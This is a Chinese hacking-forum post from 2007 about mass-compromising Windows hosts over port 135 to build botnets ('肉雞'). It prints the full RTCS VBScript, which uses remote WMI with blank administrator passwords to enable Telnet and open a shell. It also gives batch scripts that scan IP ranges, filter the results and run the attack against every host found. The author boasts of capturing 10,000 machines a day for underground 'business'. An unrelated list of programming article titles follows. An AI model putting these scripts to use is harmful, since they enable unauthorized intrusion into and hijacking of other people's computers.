135批量抓雞依賴古老得RTCS

inject2006發表於2007-09-25

關於135抓肉雞的分析最近好象135搞的很火熱看見有人也把那個批量抓135肉雞的工具發出來了我也就說下把反正俺也不早就不用那鳥東西了

上次看了那個也說一天抓1000只肉雞由於我是開快進看的沒仔細的看我以為他是自動登陸telnet 所以我就暈死了應為自動登陸telnet我以前研究很多我由於我批處理我學的不怎麼樣也就會點皮毛就加了他結果他一上來就開口批量開23賣2000RMB 人品啊我倒那鳥東西不清楚大家知道作者不那是02年安全焦點的大哥寫的我有RT整個全套程式碼的一萬年前我就知道怎麼批量開23了不廢話了先說其他的把後來一位大哥把他的RT整套指令碼整合寫了一個RCMD1。05這個是目前的最新版好象

需要解決的問題我詳細的說一下把

首先要解決的就是批量開23了

rtcs指令碼（百度一下有下的找不到就是搜尋水品問題了）裡面的程式碼如果懂VBS的朋友去看下就是先用VBS遠端連線主機的wmi服務然後剩下的是開啟和過認證部分以前有一篇文章分析過說是作者寫的有一個小BUG 就是如果原來已經開啟的話可以直接轉到退出的這裡不多說這個了

for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit

這個是我以前寫的一個批處理有興趣的朋友可以看下其實很簡單外面流傳的需要過濾23 我的不需要過濾23 有興趣的朋友可以看下程式碼正確性沒測試應為我寫過好幾個版本現在已經不記得哪個是可以用的了但是思路很明顯的相信大家可以看明白

要解決的問題二

我也嘗試了用指令碼來實現先telnet ip 然後sendkey 後來發現問題大大的只能一個一個種植不能實現批量種植後來朋友給冰冰批量就是現在大家可以在外面找的版本他很好的解決了批量登陸和自動種植的問題呼叫輔助工具設定登陸指令碼然後自動種植但是我相信用的朋友一定知道有什麼問題 telnet認證是很複雜的此外容易出現提示丟失指令碼的錯誤

其他的不知道說什麼了我今天上網給朋友搞東西弄的累的要死思路不是很清楚我在總結下把

首先寫一個S掃描的BAT然後裡面用FOR迴圈自動整理IP 然後NT過濾然後呼叫上面我發的批處理批量開23 然後寫一個批處理直接呼叫輔助工具自動登陸自動種植效果如何大家詳細的去看動畫就知道了

而後來我寫的一個版本就很帥了嘿嘿保密中應為工具是給兄弟群共享的他們有業務來著如果我把東西釋出了說是會幹掉我怕怕給會懂VBS的朋友說一下把引導一下思路

前面的掃描和和NT過濾還是一樣的不說了遠端連線wmi大家可以看rtcs的指令碼關鍵地方就是下面了

難道遠端連線到了wmi服務就只有開telnet一條出路嗎貌似wmi功能多多把具體能幹什麼去看安焦點rtcs作者02年的文章把目前我寫的指令碼和所有的工具打包起來也才70多K 同時開4個伺服器一天抓1萬隻肉雞信不信由你相信大家都知道recton裡有一個http種植者的功能把去找找文章看人家怎麼實現的最近風聲很緊有業務的朋友最好小心最近的通道不是那麼安全

這個是rtcs的程式碼自己儲存成VBS

on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if

usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number)

wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE/Microsoft/TelnetServer/1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)

wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)

wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name=’tlntsvr’")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next

function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function

function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function

經典吧，呵呵，我覺得，呵呵，管理員要給我加錢啊，呵呵
關於for迴圈我解釋下

for /f這個這個參數列示對文字操作

tokens表示擷取 tokens=1,2表示選取1，2兩個部分 eol表示忽略 eol=-表示忽略-開始的行 delims表示分割符 delims=,表示對每行以“，”為分割符號對行進行分割字元

那麼我給大家寫一個S掃描自動整理IP的批處理把

s.bat

setlocal
cls
color A
title 自動抓雞v1.0
echo ======================================================
echo 自動抓雞v1.0
echo 作者：hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt

掃描那行的FOR迴圈 for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是說從ip.txt中對每行以空格分割然後取得分割後的第一部分和第二部分字元

第一個%%i是形參代替你要取出來的部分那麼後面的2個部分的%%i 和%%j表示取出的兩個部分按順序代替的引數了

後面的幾行都是掃描完成的result過濾整理先忽略以空格 - P S開頭的行然後用echo寫入文字來轉的

用法大家把上面的批處理程式碼儲存成 s.bat然後在同一目錄建立一個ip.txt的文字

然後把下面的這些複製進IP。TXT裡面（不需要整理直接全放進去漢字不需要去掉）

掃描和整理結束以後會有一個S。TXT文字自己開啟看看效果把 ^_^ 忘了說了把s.exe ip.txt和s.bat放在同一目錄好了我閃了.

依賴管理和依賴範圍
2024-07-26
依賴
2024-09-12
依賴倒置（DIP）與依賴注入（DI）
2014-03-20
依賴注入
Maven依賴管理：控制依賴的傳遞
2019-03-02
Maven
Maven依賴範圍及依賴傳遞
2017-03-08
Maven
AI依賴算力，而算力依賴能源
2024-03-06
AI
探索 JavaScript 中的依賴管理及迴圈依賴
2019-03-01
JavaScript
【PY】PyQT 依賴
2019-07-07
QT
angular依賴注入
2019-01-18
Angular依賴注入
XUnit 依賴注入
2018-10-08
依賴注入
golang 依賴管理
2018-01-27
Golang
Struts 依賴注入
2016-07-05
依賴注入
HTop依賴包
2016-05-02
依賴注入？依賴注入是如何實現解耦的?
2020-05-15
依賴注入解耦
依賴引入 | Android依賴引入史上最全攻略
2018-07-24
Android
使用IDEA模組之間依賴找不到依賴類
2020-12-19
Idea
淺析依賴倒轉、控制反轉、IoC 容器、依賴注入。
2018-07-08
依賴注入
ASP.NET Core中的依賴注入（2）：依賴注入（DI）
2016-05-03
ASP.NET依賴注入
Maven依賴機制
2019-05-26
Maven
[譯] 依賴注入？？哈？？
2019-06-19
依賴注入
Angular 依賴注入原理
2022-01-25
Angular依賴注入
Hue安裝依賴
2018-08-20
Maven 依賴關係
2018-11-03
Maven
govendor依賴包管理
2018-07-18
Go
.Net Core — 依賴注入
2021-01-03
依賴注入
理解 Angular 依賴注入
2024-02-11
Angular依賴注入
Spring依賴注入
2016-09-13
Spring依賴注入
Spring依賴注入---
2016-11-05
Spring依賴注入
Guice 依賴繫結
2017-09-19
GUI
依賴注入系列教程
2018-05-17
依賴注入
我看依賴注入
2018-05-11
依賴注入
webapi - 使用依賴注入
2017-01-05
WebAPI依賴注入
依賴注入是否值得？
2008-03-26
依賴注入
徹底清理依賴:
2024-06-07
SSM匯入依賴
2024-10-22
SSM
Maven工程依賴配置
2024-11-14
Maven
控制反轉，依賴注入，依賴倒置傻傻分不清楚？
2022-02-11
依賴注入
依賴倒置、依賴注入和控制反轉傻傻分不清楚？
2020-07-24
依賴注入

135批量抓雞 依賴 古老得RTCS

相關文章

135批量抓雞依賴古老得RTCS